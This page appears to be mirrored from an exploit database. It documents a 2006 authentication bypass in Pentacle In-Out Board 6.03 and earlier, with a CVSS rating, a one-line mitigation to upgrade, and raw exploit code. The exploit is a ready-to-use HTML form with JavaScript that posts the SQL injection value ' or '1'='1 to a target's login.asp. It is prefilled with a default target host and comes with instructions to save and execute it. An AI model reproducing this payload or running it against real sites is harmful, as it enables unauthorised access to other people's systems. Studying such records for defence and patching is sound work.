Pentacle In-Out Board - exploit.company

vendor:

In-Out Board

by:

nukedx.com, milw0rm.com

7,5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: In-Out Board

Affected Version From: 6.03 and prior

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability

Pentacle In-Out Board version 6.03 and prior is vulnerable to an authentication bypass vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP POST request to the login.asp page with a username of 'any' and a userpassword of 'or '1'='1'. This will bypass the authentication and allow the attacker to gain access to the application.

Mitigation:

Upgrade to the latest version of Pentacle In-Out Board

Source

Exploit-DB raw data:

<html>
<title>Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability</title>
<script language=javascript>
function ptxpl(){
if(document.xpl.victim.value=="") {
  alert("Please enter site!");
  return false;
  }
if(confirm("Are you sure?")) {
  	xpl.action="http://"+document.xpl.victim.value+"/login.asp";
                xpl.username.value=document.xpl.username.value;
  	xpl.userpassword.value=document.xpl.userpassword.value;
                xpl.submit();
   }
}
</script>
<strong>
<font face="Tahoma" size="2">
Fill in the blank !:D<br>
Just enter host/path/ not http://host/path/!<br>
If Pentacle installed on / just enter host<br>
Example: host.com<br>
Example2: host.com/ptdir/<br>
<form name="xpl" method="POST" action="http://pentacle.g2soft.net/login.asp" onsubmit=ptxpl();>
Target -> <input type="text" name="victim" value="pentacle.g2soft.net" size="50">
<input type="hidden" name="username" value="any">
<input type="hidden" name="userpassword" value="' or '1'='1">
<input type="submit" value="Send">
</table></form>
</html>

Save this code as .htm and then execute.

# nukedx.com [2006-02-25]

# milw0rm.com [2006-02-25]